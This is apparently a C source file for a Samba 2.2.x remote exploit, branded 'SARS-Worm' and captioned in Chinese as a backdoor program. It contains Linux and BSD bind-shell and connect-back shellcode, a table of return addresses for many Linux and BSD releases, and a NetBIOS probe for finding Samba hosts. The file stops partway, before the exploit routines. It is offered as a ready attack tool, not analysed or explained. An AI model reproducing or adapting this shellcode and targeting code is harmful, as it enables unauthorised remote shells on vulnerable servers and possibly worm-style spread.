samd.c

一个用C语言写的后门程序

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;
	
int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

char
linux_bindcode[] =
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
bsd_bindcode[] =
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
	"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
	"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
	"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
	"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
	"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
	"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
	"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
	"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
	"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
	"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
	"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
	"\xeb\x9a";

char
linux_connect_back[] =
	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
	"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
	"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
	"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
	"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
	"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
	"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
	"\x01\xcd\x80"; 

char
bsd_connect_back[] =
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



struct {
        char *type;
        unsigned long ret;
	char *shellcode;
	int os_type;	/* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */

} targets[] = {
	{ "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode,	0 },
	{ "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,    0 },
	{ "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode,	0 },
	{ "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode,	0 },
        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,    0 },
        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 	0 },
	{ "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 	0 },
	{ "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 	0 },
	{ "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode,	0 },
	{ "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,    0 },
	{ "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,  	0 }, 
	{ "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,    0 },
	{ "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     	1 },
	{ "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode,	1 },
	{ "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode,	1 },
	{ "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,      1 },
	{ "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode,	2 },
	{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,      2 },
	{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,      2 },
	{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,      2 },
        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode,	0 },
};

void shell();
void usage();
void handler();

int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void 
usage(char *prog)
{
        fprintf(stderr, "============================Main of SARS-Worm============================\n"
                        "==========================powered by H.L.C-Team==========================\n\n", prog);
        
        exit(1);
}

int
is_samba(char *ip, unsigned long time_out)
{
	char
	nbtname[]= /* netbios name packet */
	{
        	0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
        	0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
        	0x00,0x01
	};

        unsigned char recv_buf[1024];
	unsigned char *ptr;

	int i = 0;
	int s = 0;

	unsigned int total = 0;

        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

	if(Connect(s, ip, 137, time_out) == -1) {
		close(s);
		return -1;
	} 
		
	memset(recv_buf, 0x00, sizeof(recv_buf));

	if(write_timer(s, time_out) == 1) {
		if (write(s, nbtname, sizeof(nbtname)) <= 0) {
 			close(s);
			return -1;
		}
	}

	if (read_timer(s, time_out) == 1) {
		if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
			close(s);
			return -1;
		}

        	ptr = recv_buf + 57;
 		total = *(ptr - 1); /* max names */
	
        	while(ptr < recv_buf + sizeof(recv_buf)) {
     	        	ptr += 18;
			if (i == total) {

				ptr -= 19;			

				if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
 		     	     	     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
					close(s);
					return 0;
				}

				close(s);
				return 1;
			}

			i++;	
		}

	}
	close(s);
	return -1;
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;
	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
    		return -1;
  	}
  
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
    		return -1;
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		if(errno != EINPROGRESS) {
      			close(fd);
      			return -1;
    		}
  	}
	else {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;

	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;

	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
		        } 

			else {
				errno = getsockopt_error;
				close(fd);
				return (-1);
				}

			}
		}
	else {
		close(fd);
		return 1;
	}

	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}
	return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);
	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}
  
	if(FD_ISSET(fd, &fdread)) {
  
  		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;
	
	} 
	else {
		close(fd);
		return 1;

	}
}